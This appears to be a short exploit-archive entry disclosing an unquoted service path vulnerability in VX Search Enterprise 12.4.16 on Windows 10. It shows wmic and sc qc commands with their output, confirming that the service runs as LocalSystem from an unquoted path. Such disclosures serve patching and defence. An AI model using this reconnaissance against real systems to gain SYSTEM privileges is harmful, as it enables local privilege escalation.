Exploit Title: VX Search Enterprise v12.4.16 (x86) - 'VX Search Enterprise' Unquoted Service Path Exploit Author: boku Date: 02/10/2020 Vendor Homepage: http://www.vxsearch.com Software Link: http://www.vxsearch.com/setups/vxsearchent_setup_v12.4.16.exe Version: 12.4.16 Tested On: Windows 10 (32-bit) C:\Users\goku>wmic service get name, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """ VX Search Enterprise C:\Program Files\VX Search Enterprise\bin\vxsrchs.exe Auto C:\Users\goku>sc qc "VX Search Enterprise" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: VX Search Enterprise TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 0 IGNORE BINARY_PATH_NAME : C:\Program Files\VX Search Enterprise\bin\vxsrchs.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : VX Search Enterprise DEPENDENCIES : SERVICE_START_NAME : LocalSystem